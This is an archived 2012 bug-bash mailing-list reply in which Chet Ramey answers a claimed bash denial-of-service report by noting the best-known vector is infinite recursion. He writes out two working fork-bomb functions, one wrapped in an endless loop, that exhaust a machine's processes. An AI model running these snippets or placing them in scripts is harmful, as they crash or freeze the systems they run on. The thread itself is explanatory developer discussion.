bug-bash
[Top][All Lists]
Advanced
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: I think I may have found a possible dos attack vector within bash.

From: Chet Ramey
Subject: Re: I think I may have found a possible dos attack vector within bash.
Date: Tue, 20 Mar 2012 15:55:18 -0400
User-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:10.0.2) Gecko/20120216 Thunderbird/10.0.2 
On 3/20/12 2:17 PM, Stephane Chazelas wrote:
> 2012-03-20 16:47:51 +0000, Eamonn Smyth:
>> Without sounding alarmist, I can break my machine using bash. I also have a
>> fix. I shall be officially releasing the c code this weekend at the
>> hackathon london.
> [...]
> 
> A DOS vector often found is bash *scripts* is when a script
> takes user input in a variable and that variable is left
> unquoted upon expansion in list contexts.

The most common attack vector, based on the number of times it has been
rediscovered, is infinite recursion:

f()
{
        f | f &
}

while :; do f ; done

or the even simpler

f()
{
        f | f &

}
f

both variants of the classic `fork bomb'.  The first will probably do your
machine in quicker.

Chet

-- 
``The lyf so short, the craft so long to lerne.'' - Chaucer
                 ``Ars longa, vita brevis'' - Hippocrates
Chet Ramey, ITS, CWRU    chet@case.edu    http://cnswww.cns.cwru.edu/~chet/
reply via email to
[Prev in Thread] Current Thread [Next in Thread]